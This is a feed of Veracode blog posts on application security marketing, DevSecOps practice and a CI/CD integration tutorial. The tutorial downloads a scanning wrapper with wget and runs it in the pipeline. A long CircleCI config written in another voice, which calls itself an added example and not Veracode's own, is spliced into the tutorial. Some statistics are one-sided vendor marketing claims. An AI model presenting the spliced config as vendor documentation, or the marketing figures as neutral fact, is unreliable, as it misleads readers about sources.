Veracode is the largest independent application security provider worldwide, valued at $1 billion.</p> <p>"It is essential that the achievements and success of professional women are showcased in the highest regard and their stories are told in meaningful ways," said Catrina Young, the Executive Vice President and Chief Communications Officer of&nbsp;<em>WomenInc</em>. "We are proud that we can recognize this distinguished group of women and we are inspired by their accomplishments, their distinguished careers and the corporations that demonstrate an inclusive board composition. We offer our congratulations."</p> <p>Encouraging positive dialogue from influential female voices in leadership, <em>WomenInc</em>. Magazine is a media platform dedicated to fostering the ideas, events, social commentary, and stories that inspire professional women.</p> <p>To see the full list of honorees, visit the directory <a href="">here</a> or grab a copy of <em>WomenInc.</em>'s winter issue from your local newsstand.</p> Tue, 07 Jan 2020 10:14:15 -0500 (jlavery) ver45516 Security at DevOps Speed: How Veracode Reduces False Positives <img src="/sites/default/files/styles/resize_960/public/Untitled%20design%20%2824%29.jpg?itok=tUc9i-4b" width="960" height="360" typeof="foaf:Image" /><p><em>Originally Published on November 27, 2017 -- Updated on January 7, 2020</em></p> <p>Application security solutions that slow or stall the development process simply aren't feasible in a DevOps world. AppSec will increasingly need to fit as seamlessly as possible into developer processes, or it will be under-used or overlooked. But overlooking AppSec puts your organization at high risk of a damaging breach. Our most recent&nbsp;<a href="">State of Software Security</a>&nbsp;report found that a whopping 83 percent of apps had at least one vulnerability on initial scan. Leaving your code vulnerable leaves your organization open to breach. 
In the end, you need AppSec, but you also need AppSec that developers will use. Reduction of false positives is a big part of this requirement. False positives are always a key concern because they make&nbsp;developers and security&nbsp;folks spin their wheels, so solutions should minimize them as much as possible.</p> <h4><strong>How Veracode Works to Reduce False Positives</strong></h4> <p>We aim for full automation and high speeds for all of our scans, but that doesn't mean that we compromise on quality. Unique to our position as a SaaS provider, our security research team regularly samples customer app submissions to manually review flaws. This ensures that we have met our standards for accuracy in terms of both false positives and negatives. By reviewing actual customer apps, we get a much broader and more realistic set of cases than would be possible in a QA lab that only tests applications built as internal test cases.</p> <p>Our review of these applications leads to improvements that are implemented back into our&nbsp;<a href="//">static analysis engine</a>.&nbsp;</p> <h4><strong>The SaaS Advantage</strong></h4> <p>As a native SaaS provider, Veracode has a strategic advantage in improving false-positive rates. To date, we've assessed over 13.5 trillion lines of code and performed more than 4 million scans, and with every release, our solution gets smarter. On-premises solutions, on the other hand, require their customers to manually create custom rules to adjust for false positives in their vendor's software, which can be very time consuming and complicated, or to wait for their on-premises vendor to release a new revision to the scanner, which requires downtime and unplanned work for the security teams. 
We at Veracode improve our static analysis engine at least monthly, and improvements we have made by observing the behavior of all customer applications are available with minimal disruption to your processes.</p> <p>The result for our customers is that they get very high quality at high speeds (89 percent of our scans finish in less than an hour), without having to train and maintain a team for customizing scan rules to avoid false positives. This rule customization can be costly and time consuming, and requires a skill set that is hard to come by. In addition, customizations can be challenging to maintain if the person who wrote the code leaves the company. Finally, rule customization can muddy results for attestations: it's hard to prove to third parties that your apps are secure if anyone can rig the results by manipulating rules.</p> <p>On the other hand, our false-positive rate is a low 1.1 percent, with zero rule customizing. This 1.1 percent false positive rate across real-world applications is verified and based on feedback from our customers on vulnerabilities they have reviewed. By comparison, our competitors claim a 32 percent false positive rate.</p> <h4><strong>Bottom Line</strong></h4> <p>The Veracode solution has scanned hundreds of thousands of enterprise, mobile and cloud-based apps, and we've helped our customers fix more than 48 million flaws. Bottom line? 
Better analytics, faster improvements, increased accuracy and the ability to create more software, more securely than ever before.</p> <p>Find out more about the <a href="//">Veracode Application Security solution</a>.</p> Tue, 07 Jan 2020 09:56:05 -0500 (jjanego) ver28556 SC Media Inducts Veracode into its 2019 Innovator Hall of Fame <img src="/sites/default/files/styles/resize_960/public/shutterstock_576245266-min.png?itok=WVNVDH7B" width="960" height="480" typeof="foaf:Image" /><p>We are excited to announce that Veracode has been inducted into SC Media's 2019 <em>Innovator Hall of Fame</em>. To select the honorees, the SC Media team leverages data from SC Labs testing groups, conferences, research, and referrals. The team then evaluates the nominees against strict criteria to ensure that the final selection is made up of vendors with the most promising products and capabilities.</p> <p>We're honored to be one of only five new Hall of Fame inductees!</p> <p>To announce its innovators, SC Media publishes an annual eBook highlighting the selected vendors' greatest strengths.</p> <p>"We interviewed each vendor to understand the security problems they identified and mitigated with their latest innovations," the SC Media editors wrote. "Almost every organization pointed to two interrelated struggles: exhausting technological 'noise' and personnel fatigue." This leaves security operations centers understaffed, overwhelmed, and frustrated, they continued.</p> <p>"The vendors on this list understand these problems and recognize how such issues inhibit business operations and user experiences. They have responded with two helpful solutions: advanced automation and threat prioritization. Many platforms include artificial intelligence and machine learning that recognize patterns and can replicate remediation processes in the future to remove the manual burden from SOCs. 
Many new solutions also can determine whether a noted threat poses significant or minimal risk and adjust alert policies accordingly. In nearly every case, both automation and threat prioritization are integrated into a platform that can then easily integrate with existing infrastructures, making the transition to these nextgen solutions quick and easy," the editors said.</p> <p>Veracode was selected as an honoree in the Virtualization and cloud-based security category. The description said, in part:</p> <p style="margin-left:.5in;"><em>The Veracode Platform provides an entire system of testing, scans and analysis that minimizes the presence of vulnerabilities and produces more secure software as a result. Veracode knows that vendors want to develop, use and sell software with confidence. By integrating into the development process multiple testing techniques, including static, dynamic and software composition analysis, the Veracode Platform can anticipate many potential vulnerabilities and resolve them before they ever materialize in a software's final form.</em></p> <p>Veracode also differentiates itself as a SaaS provider, according to SC Media, saying the model "makes Veracode versatile enough for local and global use, even by organizations with highly distributed personnel or partners."</p> <p>The recognition went on to say:</p> <p style="margin-left:.5in;"><em>Veracode hopes to influence the cybersecurity ecosystem as well as the organizations they serve, so that vulnerability prevention becomes not just one possible solution amidst a series of alternatives but a standard step in software development procedures. All enterprises developing their own applications will likely benefit from the security measures integrated into the Veracode platform.</em></p> <p>Veracode is also recognized for its ability to ease the workload of security and development teams by integrating multiple testing techniques into the development process. 
This strength is making a positive cultural impact on the perception of cybersecurity measures.</p> <p>To learn more about our induction into the Innovator Hall of Fame, check out SC Media's eBook, <a href=";locale=1"><em>Innovators</em></a>. For additional information on our comprehensive suite of products and services, visit the <a href="//">Veracode homepage</a>.&nbsp;</p> Fri, 03 Jan 2020 10:12:48 -0500 (jlavery) ver45436 AppSec Themes to Watch in 2020 <img src="/sites/default/files/styles/resize_960/public/AppSec_2020.png?itok=906zZRuz" width="960" height="480" typeof="foaf:Image" /><p><strong><em>Contributors: </em></strong></p> <p><em>Paul Farrington, Veracode EMEA CTO</em></p> <p><em>Pejman Pourmousa, Veracode VP of Services</em></p> <p><em>Chris Wysopal, Veracode CTO and co-founder</em></p> <p>As we said in the introduction to our 10<sup>th</sup> anniversary <a href="//"><em>State of Software Security</em> report</a> this year, the last 10 years in AppSec saw both enormous change and a fair amount of stagnation. Part of the reason for the stagnation is that software development is increasing at unprecedented rates, and security is often struggling to keep up. So as we shift our focus from reflection to prediction, we think application security in 2020 will be all about new solutions and best practices to keep up with the pace of development and empower developers to code both quickly and securely. A few AppSec themes we expect to see renewed focus on in 2020 include:</p> <h4><strong>Security champions</strong></h4> <p>With a security skills shortage and an explosion of software development, it's time to get creative to spread security skills and know-how across development teams. A <a href="//">security champions program</a> is becoming a popular way to do this, and we expect to see more of these programs in 2020. 
In a recently released report, <a href=""><em>Building an Enterprise DevSecOps Program</em></a>, security analyst Adrian Lane notes, "I spoke with three midsized firms this week; their development personnel ranged from 800-2000 people, while their security teams ranged from 12 to 25." In the same report, he says of assigning security champions to development teams, "Regardless of how you do it, this is an excellent way to scale security without scaling headcount, and we recommend you set aside some budget and resources; it returns far more benefits than it costs."</p> <p>A security champion is a developer with an interest in security who helps amplify the security message at the team level. Security champions don't need to be security pros; they just need to act as the security conscience of the team, keeping their eyes and ears open for potential issues. Once the team is aware of these issues, it can then either fix the issues in development or call in your organization's security experts to provide guidance.</p> <p>With a security champion, an organization can make up for a lack of security coverage or skills by empowering a member of the development team to act as a force multiplier who can pass on security best practices, answer questions, and raise security awareness.</p> <h4><strong>Metrics that make sense</strong></h4> <p><a href="//">Metrics</a>, or perhaps more accurately the right metrics, are crucial for understanding what's really happening in your AppSec program. They serve a dual purpose: They demonstrate your organization's current state, and also show what progress it's making in achieving its objectives.&nbsp;</p> <p>On the flip side, focusing on the wrong metrics can lead to frustration, disengagement, and a stalled program. If you've got an overly stringent AppSec policy (for instance, "fix all flaws found within two weeks"), 
your metrics will not paint a pretty picture, and your developers will give up before they've begun. We think 2020 will be the year of getting AppSec metrics right with smart, achievable, sensible AppSec policies.</p> <p>We will increasingly see a focus on providing developers with simple cues to encourage the right behavior, but in a realistic way. For example, teams start by classifying those security bugs that are highest priority, those that are important but not showstoppers, and those that, although not ideal, are acceptable to exist. Especially for the first two categories, they then track the average time to fix a security bug, establish a baseline, and then negotiate targets so that engineers and product owners can buy in. These metrics may ultimately help to determine compensation, but perhaps initially are linked to softer benefits for the team.</p> <h4><strong>Security across the pipeline</strong></h4> <p>We're seeing organizations start to build security into each phase of the development pipeline, and expect to see more of this shift in 2020. From pre-commit scans in the IDE (my code), to build scans in the CI pipeline (our code), to deployment scans in the CD pipeline (production code), security testing will cover code from inception to production.</p> <h4><strong>Scaling</strong></h4> <p>DevSecOps is no longer niche; organizations are moving faster and producing more software than ever before. Scaling is the name of the AppSec game in 2020. AppSec programs that are cumbersome or slow to scale will not last in this new decade. What are the keys to scaling AppSec?</p> <p><strong>A SaaS-based solution: </strong>The time and budget required to quickly scale an on-premises AppSec solution make it ill equipped for a modern DevSecOps environment.</p> <p><strong>Expert help:</strong> Outside AppSec expertise can be useful in helping to establish your security program's goals and roadmap. 
More importantly, it can help keep your roadmap on track by guiding developers through the fixing of flaws your scans find.</p> <p><strong>Security champions:</strong> As we discussed in the section above, security champions will be key to doing more with less security staff.</p> <h4><strong>Regulations</strong></h4> <p>More and more security regulations are specifically calling out the need for application security, from NIST to PCI, NY DFS, and GDPR. In turn, the need for documented application security processes will become paramount in the new year. <a href="">The Financial Services Sector Cybersecurity Profile</a> from the FSSCC is an example of how FinTech firms are trying to unify reporting standards for the various regulatory frameworks.</p> <h4><strong>Demand for secure software </strong></h4> <p>IT buyers are increasingly questioning the security of software they are purchasing. If you can't answer questions about your security practices or can't address your customers' audit requirements, you're likely to experience lost or delayed sales opportunities. In some cases, prospects will turn elsewhere. However, vendors that can address these security concerns quickly and effectively stand out among suppliers and leverage security as a competitive advantage. A recent <a href="">survey report</a> we conducted with IDG found that 96 percent of respondents are more likely to consider doing business with a vendor or partner whose software has been independently verified as "secure."</p> <p>In addition, thanks to the speed of modern software delivery, we will see the methods for attesting to the security of software change. For example, we anticipate a shift to process-based attestations, such as proof of the security of an application's development process (as with <a href="//">Veracode Verified</a>), rather than point-in-time third-party pen tests. 
Point-in-time tests will carry less and less weight as the speed of software updates and changes increases.</p> <p>What's behind this demand for proof of security? It stems in part from new, more dire impacts from security breaches. When Target was breached in 2013, it created headlines for a few weeks, but it didn't really affect its bottom line. Today, that has changed. Now we are seeing acquisitions fail, CEOs lose jobs, and stock values take hits because of breaches. Proving your software is secure will give companies an advantage in 2020.&nbsp;&nbsp;</p> <h4><strong>Learn more</strong></h4> <p>Continue the conversation: join our discussion on AppSec in 2020 in our upcoming webinar, <em><a href="">AppSec in 2020: What's on the Horizon</a></em>.</p> Tue, 17 Dec 2019 11:45:17 -0500 (sciccone) ver45276 Making Moves: How to Successfully Transition to DevSecOps <img src="/sites/default/files/styles/resize_960/public/DevSecOps_roadmap-min.png?itok=3V4XSUIS" width="960" height="480" typeof="foaf:Image" /><p>As we look toward the future, it is becoming critical that development organizations are not only agile and flexible but, just as important, secure. In turn, security and development need to work together more closely than ever before. When security and development are in unison, organizations can produce higher quality code more quickly and more securely while reducing costs and conforming to regulations. Most companies realize that DevSecOps is the true nirvana, but they are not sure how to get there.</p> <p>For starters, a successful transition to DevSecOps means that security and development teams need to reevaluate their roles. Ensuring the stability and security of software is no longer just the security team's responsibility; it now includes developers. Developers should be testing, and security professionals should now be <em>governing</em> the testing. 
This culture shift can be a real challenge given that most security professionals have never worked alongside development teams and are not familiar with their processes, priorities, or tools. But once security and development teams are able to successfully work hand in hand, DevSecOps is achievable.&nbsp;&nbsp;</p> <p>With this culture shift in mind, how do we formulate an AppSec strategy that transforms DevOps into DevSecOps? In its new report, <em><a href="">Building an Enterprise DevSecOps Program</a></em>, analyst firm Securosis provides an outline of the security tools and techniques needed at each stage in the software development lifecycle:</p> <h4><strong>Define and Architect Phase</strong></h4> <p><strong>Reference security architectures:</strong> Reference security architectures (or service provider guidelines for cloud services) to understand the rules and policies that dictate how applications operate and communicate. Once you are familiar with the security architecture, you should work with development to come up with operational standards. Some important operational standards to consider include minimum security testing requirements, time frames for fixing issues, and when to break a build.&nbsp;&nbsp;</p> <p><strong>Security requirements:</strong> Decide which security tests should be run prior to deployment. Are you going to test for OWASP Top Ten vulnerabilities?</p> <p><strong>Monitoring and metrics:</strong> Consider what metrics you need to improve releases or problematic code, or to determine what is working well. You should also think about what data you want to collect, and build it into your CI/CD and production environments to measure how your scripts and tests perform.</p> <h4><strong>Design Phase</strong></h4> <p><strong>Security design principles:</strong> Follow security design and operational principles because they offer valuable security improvement recommendations. 
Following these principles can be time consuming, but IT and development typically help because it benefits them as well.</p> <p><strong>Secure the deployment pipeline:</strong> Ensure that development and test environments are secure. Set up strict access controls for CI/CD pipelines and additional monitoring for scripts running continuously in the background.</p> <p><strong>Threat modeling:</strong> Teach the development team about common threat types and help them plan out tests to address attacks. If your security team is not able to address threat monitoring internally, you can consider hiring a consultant.</p> <h4><strong>Develop Phase</strong></h4> <p><strong>Automate:</strong> Automating security testing at this phase is key.</p> <p><strong>Secure code repositories:</strong> Make it easy for developers to get secure and internally approved open source libraries. How? Consider keeping local copies of approved, easy-to-access libraries, and use a combination of composition analysis tools and scripts to make sure developers are using the approved versions.</p> <p><strong>Security in the scrum:</strong> Set up your "security champions" program, training selected members of the development teams in security basics, to help with these security tasks.</p> <p><strong>Test-driven development:</strong> Consider incorporating security into test-driven development, where tests are constructed along with code.&nbsp;&nbsp;</p> <p><strong>Interactive Application Security Testing (IAST):</strong> Analyze your application's code using IAST. 
The IAST scanner aims to find security vulnerabilities <em>before </em>you launch code into production.</p> <h4><strong>Test Phase</strong></h4> <p><strong>Design for failure:</strong> The thought process behind this concept is, if there is a flaw with your application, it is better that <em>you</em> break it than an attacker.</p> <p><strong>Parallelize security testing: </strong>Address security tests that are slowing down your deployments by running multiple tests in parallel. Reconfiguring test environments for efficiency helps with Continuous Integration.</p> <h4><strong>Pre-Release Phase</strong></h4> <p><strong>Elasticity:</strong> Make sure your security testing leverages on-demand elastic cloud services to speed up security testing.</p> <p><strong>Test data management:</strong> Prevent unnecessary data breaches by locking down production environments so quality assurance and development personnel cannot exfiltrate regulated data or bypass your security controls. Consider using tools like data masking or tokenization, which deliver test data derived from production data but without the sensitive information.</p> <h4><strong>Deploy Phase</strong></h4> <p><strong>Manual vs. automated deployment:</strong> Use automation whenever possible. It is okay to use some manual processes, but it is important to remember that the more you automate, the more capacity the team will have to test and monitor.&nbsp;</p> <p><strong>Deployment and rollback:</strong> Start by using smoke tests to make sure that the test code that worked in pre-deployment still works in deployment. Then, if you need to augment deployment, use one of these three techniques. The first is Blue-Green or Red-Black deployment, where old and new code run simultaneously on their own set of servers. The rollout is simple and, if errors are uncovered, the load balancers are pointed back to the older code. The second is canary testing. 
In canary testing, a small subset of individual sessions is directed toward the new code. If errors are encountered and the canary dies, the new code is retired until the issue is fixed. Lastly, feature tagging enables and disables new code elements. If errors are found in a new section of code, you can toggle off the feature until it is fixed.</p> <p><strong>Production security tests:</strong> Note that it is common for applications to continue to function even when security controls fail. Consider employing penetration testers to examine the application at runtime for flaws.</p> <h4><strong>Learn More</strong></h4> <p>By embracing the role changes brought about by DevOps and working with developers to add security tools and techniques into the software delivery lifecycle, you can successfully transition to DevSecOps.</p> <p>Get more detailed information on building out a DevSecOps program in the Securosis report, <em><a href="">Building an Enterprise DevSecOps Program</a></em>.</p> Mon, 16 Dec 2019 13:14:08 -0500 (hgoslin) ver45181 Optiv Announces New Software Assurance as-a-Service Offering Powered by Veracode <img src="/sites/default/files/styles/resize_960/public/new_optiv_security_offering-min.png?itok=lfD9B6s1" width="960" height="480" typeof="foaf:Image" /><p>In an effort to help drive collaboration between security, development, and operations, improve speed to market, and ensure software is secure from the start, Optiv has released its new <a href="">Software Assurance as-a-Service (SAaaS)</a> offering. This program pairs Optiv's consulting and security services with Veracode's cloud-based, end-to-end <a href="//">application security solutions</a> to give companies a programmatic approach to DevSecOps.</p> <p>In today's world, every company is a <a href="//">software company</a> and, as a result, one of the top attack vectors for software-driven and supported organizations is the application. 
Just as development teams are increasingly integrating automated security into their workflows, security teams are looking for support to plan, build, and run strong application security programs that deliver on the overarching goals of the business.</p> <p>Through SAaaS, DevSecOps teams are assisted with detection, analysis, and response to application vulnerabilities with <a href="//">Veracode Static Analysis</a>, <a href="//">Veracode Dynamic Analysis</a>, and <a href="//">Veracode Software Composition Analysis</a>. In order to ensure that the flaws aren’t just found, but also fixed, the Optiv SAaaS solution includes software assurance expertise for code review, threat modeling, SDLC workshops, architectural review, and program development.</p> <p>Optiv SAaaS enables modern organizations of all sizes and maturity levels to take advantage of a highly scalable platform and seamless integration to build a customized AppSec program that delivers secure software faster. This offering can help companies empower their development and security teams, lower their security risk, and turn security into a competitive advantage.</p> <p>Learn more <a href="">here</a>.</p> Mon, 09 Dec 2019 10:02:22 -0500 (lbois) ver45086 DevSecOps Challenges From a Security Perspective <img src="/sites/default/files/styles/resize_960/public/new_understanding_btwn_dev_and_sec-min.png?itok=RWT9xo_1" width="960" height="480" typeof="foaf:Image" /><p>The transition from DevOps to DevSecOps requires security professionals to have a whole new understanding of development processes, priorities, tools, and pain points. It’s no longer feasible for security professionals to get by with a superficial understanding of how developers work. 
But this understanding can be a significant undertaking for most security pros who haven’t had to be immersed in the development side of the house previously.</p> <p>In its new report, <em><a href="">Building an Enterprise DevSecOps Program</a></em>, analyst firm Securosis notes of security teams and DevSecOps, "Their challenge is to understand what development is trying to accomplish, integrate with them in some fashion, and figure out how to leverage automated security testing to be at least as agile as development."</p> <p>In this same paper, Securosis highlights the questions security professionals ask them most often surrounding DevSecOps, which include "can we realistically modify developer behavior?" "What tools do we start with to 'shift left'?" and "how do we integrate security testing into the development pipeline?" These are all valid and important questions, but Securosis points out that there are also questions security teams should be asking, but aren’t, including:</p> <ul> <li>How do we fit — operationally and culturally — into DevSecOps?</li> <li>How do we get visibility into Development and their practices?</li> <li>How do we know changes are effective? What metrics should we collect and monitor?</li> <li>How do we support Development?</li> <li>Do we need to know how to code?</li> </ul> <p>The questions the security team is currently asking are about security tasks in DevSecOps; the questions they aren’t asking are about how to understand and work with the development organization. And those are the questions they should start asking. Where to start? 
The key development areas security teams need to understand when trying to get a handle on application security include the following:</p> <p><strong>Process</strong>: At the very least, understand why development processes have changed over the years and what they are trying to achieve, and make sure security testing embraces the same ideals.</p> <p><strong>Developer tools</strong>: You need to understand the tools developers use to manage the code they are building in order to understand where code can be inspected for security issues.</p> <p><strong>Code</strong>: Security tests are shifting left and looking at code, not fully developed applications. The traditional thinking about security audits needs to shift as well.</p> <p><strong>Open source</strong>: You would be hard-pressed to find an app that isn’t made up primarily of open source code. Understand why, and then work with the development team to help them continue to use open source code, but in a secure way.</p> <p><strong>How security tools affect developer processes</strong>: Make sure the security tools you select integrate with the tools and processes developers already use and don’t slow them down with false positives.</p> <p><strong>Cultural dynamics</strong>: You need to fully understand the development team’s goals and priorities — which are most often centered around speed. That understanding is key to getting developer buy-in and acceptance.</p> <p><strong>SDLC</strong>: It’s best practice to include some kind of security analysis in each phase of the software lifecycle. For instance, threat modeling during design, and software composition analysis during development. 
In this way, you establish a process-independent AppSec program that will work with varying development processes.</p> <p>For more details on these development areas and practical advice on building an effective DevSecOps program, check out the <a href="">full Securosis report</a>.</p> Fri, 06 Dec 2019 10:19:36 -0500 (sciccone) ver45061 [VIDEO] How Veracode Leverages AWS to Eliminate AppSec Flaws at Scale <img src="/sites/default/files/styles/resize_960/public/securing_code_at_scale-min.png?itok=IxSx4UN1" width="960" height="480" typeof="foaf:Image" /><p>Veracode’s SaaS-native platform has scanned more than 10 trillion lines of code for security defects — that breaks down to more than 4 million applications, with 1 million of those scanned in the last year alone. By scanning in the Veracode platform, our customers benefit from the convenience of running programs, not systems, and developers free up much-needed processing power so they can continue writing code without any obstacles.</p> <p>To deliver application security solutions with speed and accuracy at scale, Veracode needs massive computing power. Follow along as Veracode’s EMEA CTO, Paul Farrington, explains how the Veracode platform leverages Amazon Web Services to solve some of the hardest problems facing organizations today — 
securing software in an ever-changing digital landscape.</p> <p><iframe allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen="" frameborder="0" height="315" src="" width="560"></iframe></p> Tue, 26 Nov 2019 09:39:41 -0500 (lpaine) ver44721 Using Benchmarks to Make the Case for AppSec <img src="/sites/default/files/styles/resize_960/public/AppSec_benchmark_data-min.png?itok=uo90IXBO" width="960" height="480" typeof="foaf:Image" /><p>In a recent Veracode <a href="">webinar</a> on the subject of making the business case for AppSec, Colin Domoney, DevSecOps consultant, introduced the idea of using benchmarking to rally the troops around your AppSec cause. He says, "What you can do is you can show where your organization sits relative to other organizations and then your peers. If you're lagging, that's probably a good reason to further invest. If you're leading, perhaps you can use that opportunity to catch up on some of your more ambitious projects. We use benchmarking quite frequently. It's quite a useful task to undertake."</p> <p>Ultimately, the value of benchmarks is two-fold: you can see, as Colin says, "where you’re lagging" and use that data to make the case for more budget. But it also strengthens your ask by giving it priorities and a clear road map. For instance, you could say, "we need more AppSec budget," but your argument is more powerful if you can say, "OWASP’s maturity model recommends automating security testing," 
or "most organizations in the retail industry are testing for security monthly."</p> <p>If you’re looking for some AppSec benchmarking data, we recommend considering the following:</p> <p><strong>OWASP’s OpenSAMM Maturity Model</strong>: <a href="">OWASP’s Software Assurance Maturity Model (SAMM)</a> is "an open framework to help organizations formulate and implement a strategy for software security that is tailored to the specific risks facing the organization. The resources provided by SAMM will aid in:</p> <ul> <li>Evaluating an organization’s existing software security practices.</li> <li>Building a balanced software security assurance program in well-defined iterations.</li> <li>Demonstrating concrete improvements to a security assurance program.</li> <li>Defining and measuring security-related activities throughout an organization."</li> </ul> <p>At the highest level, SAMM defines four critical business functions related to software development. Within each business function are three security practices, and within each practice there are three levels of maturity, each with related activities. For instance, under the Business Function "Verification," there is a security practice called "Implementation review," which has the following maturity levels:</p> <ul> <li>Level one: "Opportunistically finding basic code-level vulnerabilities and other high-risk security issues."</li> <li>Level two: "Make implementation review during development more accurate and efficient through automation."</li> <li>Level three: "Mandate comprehensive implementation review process to discover language-level and application-specific risks."</li> </ul> <p>The model also goes into detail on each of the security activities, the success metrics, and more. There is also a related "How-To Guide" 
and "Quick Start Guide."</p> <p><strong>Veracode’s Verified Program</strong>: We created <a href="//">Verified</a> both to give customers a way to prove to their customers that security is a priority, and to give customers a road map toward application security maturity, based on our own 10+ years’ experience of what good AppSec looks like. Want to see how you stack up against a mature program? Take a look at the requirements for the highest Verified tier — the Verified Continuous level. If your program looks more like the Standard or Team levels, use that to make the case to grow your program with a clear roadmap of what is entailed in taking your program to the next level.</p> <p><strong>Veracode <em>State of Software Security</em></strong> <strong>(SOSS)</strong> <strong>report</strong>: Our annual report offers some valuable benchmarking data for your AppSec program. Because we are a SaaS platform, we are able to aggregate all our scan data and look at trends across industries, geographies, and development processes.</p> <p>You can use the <a href="//">SOSS report</a> to benchmark your program against all organizations, those in your industry, or against those that are implementing practices that are improving the state of their software security. For instance, this year’s report found that 80 percent of applications don’t contain any high-severity flaws — how do you measure up? In addition, we found that those who are scanning the most (260+ times per year) have 5x less security debt and improve their median time to remediation by 72 percent. How often are you scanning?</p> <p>You can also use the SOSS report to measure your program and progress against your peers in your industry. For example, this year, we found that most of the top 10 flaw categories show a lower prevalence among retailers compared to the cross-industry average. The exceptions to that rule are Credentials Management and, to a lesser extent, Code Injection. 
It’s possible these tie back to core functionality in retail applications — authenticating users and handling user input. If you’re in the retail industry, you’ve now got a solid starting point for vulnerability types to focus on. If you’re in the Government and Education sector, your peers are struggling with Cross-Site Scripting flaws; are you? And finally, those in the financial sector have the best fix rate among all industries at 76 percent — does your fix rate compare favorably?</p> <h4><strong>Learn more</strong></h4> <p>To find out more about making the case for AppSec, check out our new guide, <a href=""><em>Building a Business Case for Expanding Your AppSec Program</em></a>.</p> Fri, 15 Nov 2019 09:50:25 -0500 (sciccone) ver44371 How to Leverage YAML to Integrate Veracode Solutions Into CI/CD Pipelines <img src="/sites/default/files/styles/resize_960/public/integrating_Veracode_development_pipeline-min.png?itok=SZlRfMS9" width="960" height="480" typeof="foaf:Image" /><p>YAML scripting is frequently used to simplify configuration management of CI/CD tools. This blog post shows how YAML scripts for build tools like Circle CI, Concourse CI, GitLab, and Travis can be edited in order to create integrations with the Veracode Platform. Integrating Veracode AppSec solutions into CI/CD pipelines enables developers to embed remediation of software vulnerabilities directly into their SDLC workflows, creating a more efficient process for building secure applications. You can also extend the script template proposed in this blog to integrate Veracode AppSec scanning with almost any YAML-configured build tool.</p> <h4><strong>Step One: Environment Requirements</strong></h4> <p>The first step is to confirm that your selected CI tool supports YAML-based pipeline definitions, where we assume that you are spinning up Docker images to run your CI/CD workflows. Your Docker images can run either on Java or .Net. 
Scripts included in this article are targeted only for Java, and you will need to confirm this step before moving on to the next one.</p> <h4><strong>Step Two: Setting Up Your YAML File</strong></h4> <p>The second step is to locate the YAML configuration file, which for many CI tools is labeled as config.yml. The basic syntax is the same for most build tools, with some minor variations. The links below contain configuration file scripts for Circle CI, Concourse CI, GitLab, and Travis, which you can also use as examples for adjusting methods of config files for other build tools.</p> <ul> <li><a href="" style="font-size: 13.008px;">CircleCI</a></li> <li><a href="" style="font-size: 13.008px;">ConcourseCI</a></li> <li><a href="" style="font-size: 13.008px;">GitLab</a></li> <li><a href="" style="font-size: 13.008px;">Travis</a></li> </ul> <h4><strong>Step Three: Downloading the Java API Wrapper</strong></h4> <p>The next step requires downloading the Java API wrapper, which can be done by using the script below.</p> <pre class="language-yml"><code># grab the Veracode agent
- run:
    name: "Get the Veracode agent"
    command: |
      wget <a href=""></a> -O VeracodeJavaAPI.jar
</code></pre><h4><strong>Step Four: Adding Veracode Scan Attributes to Build Pipelines</strong></h4> <p>The final step requires entering in the script all the information required to interact with Veracode APIs, including data attributes like users’ access credentials, application name, build tool version number, etc. Veracode has created a rich library of APIs that provide numerous options for interacting with the Veracode Platform, and that enable customers and partners to create their own integrations. 
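Putting Step Three and Step Four together, the following is one complete CircleCI config.yml that builds the application, downloads the wrapper, and then runs uploadandscan against the built artifact. It is an added example, not a script from Veracode's documentation or from the template links above. The Docker image cimg/openjdk:11.0, the Maven build step, the target/app.jar artifact path, and the VERACODE_WRAPPER_URL and VERACODE_WRAPPER_SHA256 variables are assumptions for illustration (the wrapper download URL is the one shown in Step Three). The API credentials are read from CircleCI project environment variables so that they never sit in the repository, and the wrapper's SHA-256 is checked before the pipeline executes it.

```yaml
# Added example (not from the original post): CircleCI 2.1 pipeline that
# builds a Java app, fetches the Veracode Java API wrapper, verifies it,
# and runs uploadandscan with the same flags as the post's Step Four.
# Assumptions: the image, the build command, the artifact path, and the
# two VERACODE_WRAPPER_* variables are placeholders chosen for this example.
version: 2.1

jobs:
  build-and-scan:
    docker:
      - image: cimg/openjdk:11.0   # assumed Java build image
    steps:
      - checkout

      - run:
          name: "Build the application"
          command: mvn -B -DskipTests package   # assumed build; yields target/app.jar

      # Step Three from the post: grab the Veracode agent.
      # VERACODE_WRAPPER_URL is a placeholder for the wrapper download URL.
      - run:
          name: "Get the Veracode agent"
          command: |
            wget "$VERACODE_WRAPPER_URL" -O VeracodeJavaAPI.jar

      # Added check: refuse to run a wrapper whose hash does not match the
      # value pinned in project settings (VERACODE_WRAPPER_SHA256 is a placeholder).
      - run:
          name: "Verify the wrapper checksum"
          command: |
            echo "${VERACODE_WRAPPER_SHA256}  VeracodeJavaAPI.jar" | sha256sum -c -

      # Step Four from the post: upload the artifact and start a scan.
      # VERACODE_API_ID, VERACODE_API_KEY and VERACODE_APP_NAME come from
      # CircleCI project environment variables, never from config.yml.
      - run:
          name: "Upload to Veracode"
          command: >
            java -jar VeracodeJavaAPI.jar
            -vid "$VERACODE_API_ID"
            -vkey "$VERACODE_API_KEY"
            -action uploadandscan
            -appname "$VERACODE_APP_NAME"
            -createprofile false
            -version "CircleCI-$CIRCLE_BUILD_NUM"
            -filepath target/app.jar

workflows:
  scan:
    jobs:
      - build-and-scan
```

The folded scalar (`>`) joins the command onto one line, which is the same invocation as the single-line script in Step Four, just easier to review in a pull request. Set VERACODE_API_ID and VERACODE_API_KEY as project environment variables or in a CircleCI context; the checksum step is not part of the post's four steps and can be replaced by whatever pinning mechanism your team already uses for build-time downloads.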
Information on Veracode APIs is available in the <a href="">Veracode Help Center</a>.</p> <p>The script listed below demonstrates how to add attributes to the Circle CI YAML configuration file, so that the script can run the uploadandscan API, which will enable application uploading from Circle CI to the Veracode Platform, and trigger the Platform to run the application scan.</p> <pre class="language-yml"><code>- run:
    name: "Upload to Veracode"
    command: java -jar VeracodeJavaAPI.jar -vid $VERACODE_API_ID -vkey $VERACODE_API_KEY -action uploadandscan -appname $VERACODE_APP_NAME -createprofile false -version CircleCI-$CIRCLE_BUILD_NUM -filepath 
